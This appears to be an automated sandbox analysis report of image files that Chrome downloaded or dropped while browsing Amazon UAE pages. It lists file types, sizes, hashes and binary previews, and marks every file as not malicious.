                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................>..............................!.1."AQ..2q#Ba..$...%3R...'s....................................>..........................!..1"A..Qa.2#3Bq...$Rb......r.4C..............?..c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..Ut.!.YB$.{.:......{......B..O<...ss4V..F..<.$0....$....q..Y.T.X.7^.X.PI'@.I$....O.+...F.<..$......?i...%. .OuQ0....^!.. P........ `...,..f.|...V.F..C..Y#......H...~#.$..c^E.r."T...m.Q...#.,1aI'.-.T...Y..W.h.>..J......d5 @{...?.@D~.}.....=TP..j..........G.T..........Xm..E..US.D..eR.l_....=6.#.......;.....UU.P.x.*,..8.v.GYC.%...G..DK.r............D...-...Z..g..v>.t.G{....K..p...4g.......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):7161
                                                                                                                                                                                                                                                                      Entropy (8bit):7.876604059078097
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:G83CU0ahykjXJlDRl+ITfeOHU+vs7tz25GQshc:G83CU0a57Rlzd0Sq525GQshc
                                                                                                                                                                                                                                                                      MD5:A3A65B5CBF4F351C9634092C10A06B02
                                                                                                                                                                                                                                                                      SHA1:B1838213B7789B441947941098ADED9B2E4A7732
                                                                                                                                                                                                                                                                      SHA-256:B3D08F891C275D0BA1BCA972352022EC31E234ACFABA55E2EA1EFEA59B73F055
                                                                                                                                                                                                                                                                      SHA-512:9DA117E3E596EE102B6549EE5865B1219723D11A0C0A9664F58FB638EA9879DA724FBB5A533538E675F7AE5959C00F5AB910446FA80509D10A1E5D13D97668A9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`...............mo.*Sc....tz...TX..a.y...t.3..@............T..UH......t.)==>.y..+N.0|.....[Mo..,.._....P.....h...YEr...<+..}.^U.G.a.......|C.m.*R..O......|.|r...{.W.....i...u..W.[.6....6..........W.~N.....[.>z..H..0.g..I...9-..g.qIp:......yo.O....-..rS.C.....JV...z.c.>.m.c.:...].%..}9....c.[.<3_om........S.._..zc.7M3......5.Q..r.>o.w....O.9..w.O>[C@H............^O.o......?.2..n..Z../.1B.....9.;c5...]...]..O4..M9.c....J.....H.89y`......F..:yF......[ys.%QnY....)774r}t.z'V.x.Ww....'s..0.|..k5.........u../.......F...u.o.f.t...d.r.K...4..l....$L..[7.............5..S.N*<...R.m%]...=6..nl1@.....?"d.W4..FY....k[.Oo.r]z....r...................2.............................! "012@.#3AQ.$4`Baq............G.1....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 179x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8228
                                                                                                                                                                                                                                                                      Entropy (8bit):7.944789520821368
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:zITEmvztkjGzrpjWDor3cjsm34LhYBIR+ck2arXSjT:7GWDo7c9ohYyRPAT2
                                                                                                                                                                                                                                                                      MD5:C231B92A44317366DAA8EC724F82193E
                                                                                                                                                                                                                                                                      SHA1:FBF0E7EC0B3A61BC9689FFECA36E4DC739871CC5
                                                                                                                                                                                                                                                                      SHA-256:145F9FB0B5A6E6CC48FFB860EC09927FF844C451C1D880466679AB4EBDAFCDB1
                                                                                                                                                                                                                                                                      SHA-512:D48D0D9FB873B42A89150A48B04010E90E72687731628E34D71F08DA9B48D21EFDC0DF58357558D783EBCF0EB3B92F30BABA0FD277F2E5C1E3D0F342787694DA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!.1."A.Qaq..2..#BR....3Cbr...$4Ss.5d..................................................!1..."Aa.2Q...#..3.................?..R.B)JQ..)D"....R.B+E.&.i.Ed.'.....;a.:.7...2..3.....Z.......o."...........;n..2._{bEl,....v.U.{.d.....!...B..v.....@..u.G...Yb.B...,...1F..b..."}.7PQ..O<....&.p8....8=..._<.+I]........7p..........hh..u.R....X..... ..J.{9.2i.E.r...u......7..3.Q..4M.....*."....R.B)JQ..)D"....R.B)JQ..)D"........[.}..d.%q....S...W.^..|YXN....(YD.N._y......_m...J.......P.v. ...W...r.w6...:..r...m....?>.....k.Z[V2......?F.I..9V..~5P.=..X...5.......[..N)O...N....y{5....U8.......&>e..p.....g......x...05....N}..R...)JQ..)D"....R.B)JQ..)D"....R.B*...au<..b@d>.B"..K...MZL..bp...u{x.....n...B.O.OnMYt....y.q.-.{G.....VvFd>/"U..;....Q.n-ZX.....B.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4937
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9116381578289445
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:7lDZLsyyesngEW5sK0Onmo7yaw/47GC8EU4CYKKRAjhzVYf:fC9/WiKfP7X/SZ9zVg
                                                                                                                                                                                                                                                                      MD5:C0091C4CCA8AF9F02E1CD4AA779B82BF
                                                                                                                                                                                                                                                                      SHA1:3F4D5AA76E6FEAC6AD4C5BFAD438456408C9594D
                                                                                                                                                                                                                                                                      SHA-256:B08C1A511006AE508E725F09F650497B566DF9D9D92ACEFB6F1F1084BB7ECD8B
                                                                                                                                                                                                                                                                      SHA-512:6DF165A8B4439DEFE23BFA8C7AA346227BBC0A88E13C80EBE694B95E352A5F6135034C2362AAFAC1F980B7BD10385E749BECB9AE1207FD345CA6195372916053
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924072_186x116_1X_en_AE._SY116_CB566513340_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t....".................................................................!1."A.2Q...BTa.#qr...$4RSb......35Dst.......................................................!1A...."2Qa.....Bq....#br..............?...R.._;JR..v+-.p...+.ius.Z..."...J...n~.;V8.......uq.v.z.MF~.<.l..#..CQ.E..K..N5...Y.....>..~.;T6.c..3.N.X...Ae....[-.6.X.7n..i.aC.M....c..Z... <l:.-)rNV..l...q..z7U.Q.\7?uO.........j.q..e....{I.iT..K...r..8.]..iw.o..l$K..q.!6.:.2....^?.....9.g....7...I.#*68..8......~~.n~.;S....F....Ce.ua$...")D.p...z....S..{ngI.....w.'p.....3...R.c6...[...BL...F..M..m..........;S....5N..q.V.Vm#g.5...K...Hb.3.zu..]..{.:TH...T..$..G.H.....?.V.W.kAuM....EKr.Ys..Eq.'..<..W....>..~....T...W.%.3.D+3.Pe.".nr2.x#.4...R........Y$..w.........1..}f.GE}VK..........H..H....p\...?.......Y..[.<9,..q...ege.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x360, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16438
                                                                                                                                                                                                                                                                      Entropy (8bit):7.820012070513804
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:HsXiAKLyQ8h8Sm6xVwfNj+3jt5BzOWZQMd0A8XBWF:H4iS8swijt36OHKA0WF
                                                                                                                                                                                                                                                                      MD5:639FB25C08B87DCD9141FCA44AB152CD
                                                                                                                                                                                                                                                                      SHA1:32BA5D4E5F8ED31F84A7FB38B5E0CAEBAD572B3B
                                                                                                                                                                                                                                                                      SHA-256:2FC5F3FC712FF3704D15D9117290B371E02573E8A382CA8717C32EF9D1885307
                                                                                                                                                                                                                                                                      SHA-512:4A0B8640E2E3EABD034C7D34EBF5DCE4DDBB769CD9738253566FF1F702C623B4BC3ADE33C373177B3868EF2A23429419447BBF413E273F30DEB945EDB97AA8AE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://d5glw3nnbe3pc.cloudfront.net/transcode/AssetLibrary/AssetLibrary/amzn1.assetlibrary.asset1.cba040ec39598499ae5c8798d5fd8e95:version_v1/6b1130ee-4584-49eb-8b7b-f8e30dbfc532/1679383138133_THUMBNAIL-360P-FRAME-3-CAPTURE-2.0000001.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF...................................................%...#... ,!#&')*)..-1-(0%))(...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......h...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(....Q@.(.AE.P0..(...(...(...(...(...(...(...(...(...(.....~8Y..E..+}.}.k7.:..7..... #...aM7.i..#..}G.*.Ey...B.3Gi.m........j..5h....Ep.%3..Q.....SA3\]D.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):33740
                                                                                                                                                                                                                                                                      Entropy (8bit):7.930209971614945
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:vGhGWmyLy0diKyZjUYc/1ZChv0aM33sj7C8NlQPvY0WTg642yfWlf:O2I1ZyO1ZChvM33UC8jQPA0WRykf
                                                                                                                                                                                                                                                                      MD5:BE9A1506DEACD39058752C85F0223EA1
                                                                                                                                                                                                                                                                      SHA1:D3B4024E2083059455EFD3A1D8E64CABAF09D0E1
                                                                                                                                                                                                                                                                      SHA-256:2CDFB77697362FA900DD318F22E6711B1F94994A72D54560755BE6BF0004541E
                                                                                                                                                                                                                                                                      SHA-512:7B6769A14BC6047B6B5EF634344A0898A03940B57D62B6F8241757F44F046E295D1CFAFAFF07B691E02B2F837458403E3EFD956F5A5B7B57D1B3BD675BB906B1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d............................................................................................................!1..AQ."a..#2BVq......Rbr.38.....$6CScsu....%Dv......&Fdt....4TW................................!1"AQRaq.....2........BSr..#b....3C.$4..5............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...8$....u&..^.*E..T[X}..:...1........~+.*2k..]...3.ex.....]...v..T.K.K....e..........L3..f...w..Z...e.8...Xwn...T...m..].5K...l......?......o.zT.A}..-;.m..H.....$.;.,}%..~..(.....J..i{.f.E0.{.....'....~...?..1..........;..\..h..a..o....V........@.....W.e...j.1qh..../....[....R......~O....W.?....>g|.O|^......2@.v.C?..+...|.[.%.'.jZ3.|Mz.p.rn[.....-...V~..i..f...J.2.*T^...^..z'A.2.../.?o.z.Q../2>S.......x.ux..$._.WO.F..q.WD%.*v......V.R..f.W,N..3.U.....Z./.i
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D4172%26pc%3D7783%26at%3D7783%26t%3D1724264961819%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26lob%3D1:7782
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 167x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11385
                                                                                                                                                                                                                                                                      Entropy (8bit):7.960975339173795
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:mT4wHXwlTixzvHmxj8dB792TzKN2HWbFMsMBEe/Sd9OwJaog+LBoDqmx+jesn6:mH4TsvHxv7MTzk2HG9d9Okao9MqBVn6
                                                                                                                                                                                                                                                                      MD5:AE29AF23C6AE14B0C4639925C6D91EBA
                                                                                                                                                                                                                                                                      SHA1:750FB074BDC3AA5EC55F11E3627D76CF954A3A64
                                                                                                                                                                                                                                                                      SHA-256:EEBC05F1C6805700CE3C52C4AD78790647006F8BABCB1AB379E51F1DCD162729
                                                                                                                                                                                                                                                                      SHA-512:3BBFFFF0CC126D0B35B7D46F2BC91B03DBA8ABEEAAFDE5A9CAB04256F0387458EB940B1744EC72F972CD975387025C3A8245E19E55B347041607032ADC5ADA58
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!..1A."Q.246qrst.......#3RTUu.....$5BSa...b...%CDc...................................................1!.."2A.3Qr...S..#4BRaq................?.V...F..56eE.\.GOW$..A+F.ys.6[nw8..MU.....J..CS!$.@".p.....Rf...]].Kg`..f}.G{......lm.j'.'.#..d.d..#.,gA.c........wh...1._<..j.+!..BG=.^A*C.U.B.P./._.8...z.3......H.St.*d.....r.O..e5j.5.K.8t%)R...Y.wP.....{...((...hr.....;....p.Lm.S....%or.....^._x....K...\.A.}d.J..Q+;..*..rI.v...:A`|.j...X.}..#..ce.. ..2\...)../^....:9.TZ..J........rG...NY.g.|..!..z..t.. ..%......6.!.?n...:..d..n...:..d.....Lz.56....z..0..y.]...dI0....<..U.L.[...<..U.L.[.c.Q.......K...v}.YzJ.SI... ...|+.......\..W.2}lO.\..W.2}lz.7fzfhL.... .)c_.B......Ju...&A<)F..S......z..a.u.?9.~.'...u.z.....~.......)..........G
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):29265
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9398083328038505
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:WCI4GScYwckj7HsWQPO9OgXp9k3l/WbDMkUkUnaq+:WCZ5Gj7RQ29OMp23l/kAkknaq+
                                                                                                                                                                                                                                                                      MD5:E4EAA5BDC19B7946427AA063B2AA636C
                                                                                                                                                                                                                                                                      SHA1:22635D817E8EE5D9FF9680186975D2F7F73D372D
                                                                                                                                                                                                                                                                      SHA-256:AFFD1BF41B521BEE3861A82B73D8CA5055931E2A6619C47763B96396A8001AA1
                                                                                                                                                                                                                                                                      SHA-512:EBFAF4591762BF398DF89F13D87783CFD9F981238F8029DAF0449BDDA7AC836D22752E55F95C5D6726ADDF8CC66E898492C537B6EAF69E62B2FD3391D71D5071
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................@...............................!.1.."Q.Aq.$2a..#%...)3.:Erw.....................................5..........................!.1"..A2Q.#Raq$B..3.&................?...1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc..F1.Dc4....}k...{.........f...X..3mK...[J..+....Zw..q-.#M.iV.mn!.{z.Iqhgk.BT....%.....^..4yq.F.=.[(...)*RT.Yq.!IR...[J...[.-.6..R....a*..q..!.#.........^...... .A.l...~.?.17q.g...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c.)._..&P..E...)....-.....%...U..-..X.bu>.!..jP3..Y.;..j<.E...~[.....;.etj=}.Q...&.*.!......V........_.N';.V..Q..m-.!Z....*..o[...oZ..:..~r.q..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D1936%26pc%3D12737%26at%3D12737%26t%3D1724264943923%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:12737
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):15963
                                                                                                                                                                                                                                                                      Entropy (8bit):7.902200877228727
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:13JOuSyNaFBjCmAChTLhz4kI0jQp7X2I8QPlwXesE2xAeiS1uJNSuSKFMAnfj298:1YDykrT9I0jQwNdN+M1u+Afj2b2lNgy7
                                                                                                                                                                                                                                                                      MD5:6FC210776F724386ADF76761D3AD071E
                                                                                                                                                                                                                                                                      SHA1:BA555BF0BCCDEB5824F74031AF9594B5858F180C
                                                                                                                                                                                                                                                                      SHA-256:75A498BE61072DDBB316897008765811B69C7419B5D84D2891691E6E88B3C479
                                                                                                                                                                                                                                                                      SHA-512:7593AD303599EA41AC97A125602BA4C764F81375B9FCF74F62B6FDADFE26BA9F6E4C91B1FD6EB7E3E2C94365628AB0BAC50F4A051120408B91F6A73C9925708E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/L2-Smartwatches-Realme-750x300.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."................................................ ...............................A.#.............X.0....4.....Z.*............5.<cp....;...@..............^....W.c...to.d..........y...w...Z...].i..T...........H.o)S.......q1-..g.@......1@...!..\....`.K..l..6..r`.........E.j.EuS..S.<.[.UD.=#..............{.Q..j=s...X..............9..........@T9.......FS..`..........).jp...}..r....b.W.....a..........|.k...N..<..u.YG.>.e..Wz..W.................!.G...+..G..dKT..............y~.s.^f.y|4=..r.~..|....L..o...............L.]......+.....A... .......qm/.[.1Y..#J.l=k...?....<=.W`.`...@.......s...`%..^.h.<.Gz.s.......[.`...X.O&........J.5.w7L...:.2.....h..7.j.}..\..Y...l.{.l.|.&&....d..@.....OF....G..6...w...MR3%.......`..g...F..=...U....5...wT.......y.g.z....s..r.?Jx.W.B.nI......./..n.~n6.ul..K..w..T....8
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 111x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):7513
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946532685684176
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Pd2rKcTJrj/PhM4JEn1J+iPgXHCcUKVGa4yjXV6qd:AT11M4QJxWC+gC4qd
                                                                                                                                                                                                                                                                      MD5:98FACFE423344FF1AF2942DD5A62B6F7
                                                                                                                                                                                                                                                                      SHA1:31AB4796D82617FCE6EBFE3A7DEE4020FF6690CF
                                                                                                                                                                                                                                                                      SHA-256:EAA84878B53CAE8541B4DB901EE958401247E554F33FBC53FAFD1D6A1ABDFA3F
                                                                                                                                                                                                                                                                      SHA-512:0C7B5C0AF6389702E02184DE55FFCFCD3FFA85FEA1693EC11E7401DDF190F9FAEED0A17DC931426E5078EF74D701DBC32F5F69FB5C1291376942C8409256D94E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71AI-Sm8v2L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........o.."................................................................!1..A."Qa2Bqrs........#346RUbtu....$ST...c....5Cd...................................................1....!2Aq3BQR..r............?...;...P.5.Na.H......I.n..1$^%0..y...+..+3Y....2..{.....86$rl.*.5...sI...9..C....t.pW..9..`.,..C1L.z...j..(..J..:..z+.iJ.. ...k.].....*{.<....+nR.F...OkD....P..T.<.i..jb......e.n>.Gh9....!2RT.O.S..2..B2%.0fP.....E..L.L..yfp!.....M$.=C.?p^."K.........n..o...<o.?;...=?..`..-..Xb{A.?.+.....G.-B:.......5GA=t..4O4.8.4i\.z..|V..H.OQ..".c..n.....(c..7..).o2...D....7*.....>.(...U...2.I<K.J.qbt.e.u.euMf.......U..R..h..jv18....#..F...|YK(.F.tr..f.{..R..G......E..2.Z.Z.....a{.zm.8.[h.t.'.x.).,.....TR .e.-4......py.MA..r....(..{!u..k...B..r.....w.g......uC..?..8.K,.M...>U.P~"..<.5...;...4%D..h.....He.......in.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 159x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11862
                                                                                                                                                                                                                                                                      Entropy (8bit):7.965076868156287
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:lfI8l6tWZr07DaJnVoaAFG51emQHT/ceHJcnYgeyLQGEJfn/3A1/d:lQ8l/aD6nVo5qGzPHJcnYZyLQG0fned
                                                                                                                                                                                                                                                                      MD5:59B0EC3800623939D6761FDB1EC1188D
                                                                                                                                                                                                                                                                      SHA1:6DD86BDD0CA46339DC8F8575AD4D20987A849B3B
                                                                                                                                                                                                                                                                      SHA-256:05C97FC4ECEFCBD55D7E4A41F0EFE7CB27918AE8E0AD3F8723B3039F1202F241
                                                                                                                                                                                                                                                                      SHA-512:97D4E787F23988D1975F6664C4FB5D8E7E23970EC3533D21C6CD6F07777882FFB724D9029FB14C1B7C2A2388CC6ECE2F10CB11E0F1AECB5BAD40175CB0E4637F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/91KwPLW4BqL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1.."AQ2aq.#b....BRU.....%STt....$35Edr........Cs..................................................!1..AQa."2q..#B....3.R................?.*..WM.kR..g="!":xVx....c..bH=l0....y..z..{c..-..a.i....s...0.gD.B..)F2.%.J..y...d..i$.L@m...|m..^q]..._..?:.}.v..m.4.U.O...Z|.$=.G.=;.kP.e..B....:..@.Y.%.i....... g...L....L.T........J...=.y...+............*...m.d..S...$.,.M....K.....Xt7R1...v.l..=$...y.B./.u.kZ0......m.,9..s..P.D..e.#.....O;.....Q:)>..I.$.\O.@..#.9m....[..&.X.......>..#........Y......~p..j.W..k..... j......d3.p[....5...Go......bGH.5O_P%...p....+>....G..W.}.V*u...P.A...Q.....Z........q.m]S...]N........YLvFN7..>f*.....G...o.....u..S..h\9.....q[..~......j?...Y......)..J.sM.\8.*....j.W.cF..g..i^...._..,D.o..M.~....K...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D2094%26pc%3D12736%26at%3D12736%26t%3D1724264943922%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:12736
